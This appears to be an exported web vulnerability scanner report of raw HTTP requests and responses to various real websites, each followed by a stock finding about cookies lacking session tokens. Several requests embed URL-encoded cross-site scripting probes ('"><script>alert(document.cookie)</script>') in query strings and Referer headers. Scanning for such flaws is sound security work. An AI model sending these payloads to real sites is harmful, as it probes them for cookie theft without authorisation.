GET /js/jsserv.php?mblID=2010103023295009 HTTP/1.1 Host: track2.mybloglog.com Proxy-Connection: keep-alive Referer: http://www.orthougm.com/nslookup.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:47:59 GMT Set-Cookie: BX=7rv9lsd6krhcf&b=3&s=je; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml" Expires: Sun, 06 Feb 2011 00:00:00 GMT Set-Cookie: mbl_sid=N2011020513475974; expires=Sun, 05-Feb-2012 21:47:59 GMT; path=/; domain=.mybloglog.com Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17463
<!-- var mbl_recent_visitor=''; var mbl_current_visitor=''; if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets_refresh/images/dropNavArrow.png?01AD=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw&01RI=28F5F496E208D76&01NA= HTTP/1.1 Host: us.blackberry.com Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1296999181981; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=641990084704; BLLY=CT-1
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Last-Modified: Thu, 03 Feb 2011 21:57:47 GMT ETag: "1b28800-239-db1eacc0" Accept-Ranges: bytes Content-Length: 569 Content-Type: image/png Date: Sun, 06 Feb 2011 13:32:26 GMT Connection: close Set-Cookie: BLLY=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw; expires=Sun, 06-Mar-2011 13:32:26 GMT; path=/; domain=.blackberry.com P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /od/soupsstewsandchili/r/hotandsour.htm HTTP/1.1 Host: vegetarian.about.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><!--DVID=000022CC--><html lang="en"><head><meta http-equiv="X-UA-Compatible" content="chrome=1"><m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /werbemittel/WebObjects/werbemittel.woa/wa/ads?apid=6f09cd3d-7986-4113-9124-912c77e974a9&zanpid=11259592C1875273789S14786739T1469378460983287808&zanpartner=1049301 HTTP/1.1 Host: www.active-srv02.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU5MkMxODc1MjczNzg5UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.6.32 Date: Sun, 06 Feb 2011 17:05:24 GMT Content-Type: text/html;charset=UTF-8 Connection: close location: http://dslshop.vodafone.de/eshop/pv/97444194?tsID=za1049301 set-cookie: apv_1=6f09cd3d-7986-4113-9124-912c77e974a9|za|tsID=za1049301; version="1"; expires=Thu, 07-Apr-2011 17:05:24 GMT; path=/; domain=.active-srv02.de x-webobjects-loadaverage: 0 x-webobjects-servlet: YES Content-Length: 0 P3P: CP="NOI DSP COR CUR OUR STP NAV STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:57 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296942777855214; path=/; expires=Tue, 09-Feb-16 21:52:57 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-485925 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/?source=footer_noannual_credit_cards HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2&jr=3 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; bpl1297002238=1296998638; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297002287=1296998687; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=938777&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=862030 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=271024 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.218CKOWJ; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1296950890=1296947290; bpl1296950921=1296947321; videoID=expired; bpl1296950936=1296947336; j2playlist=5731; auto=expired; bpl1296950967=1296947367; playlist=5731;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; bpl1297012271=1297008671; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; bpl1297012271=1297008671; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; bpl1297002238=1296998638; videoID=expired; auto=expired; playlist=5731; j2playlist=4881; ARPT=NQJKKYS192.168.100.219CKOWU
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=271024 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; videoID=expired; auto=expired; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/81211909126097148926263.htm?vs=1&r=www.kledy.de%2Fbookmarks.php&s=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&t=76345 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=938777&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=862030 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; bpl1296950905=1296947305; videoID=expired; auto=expired; playlist=5731; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; videoID=expired; auto=expired; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/index.php HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/ HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml"><head><titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ipj/ HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
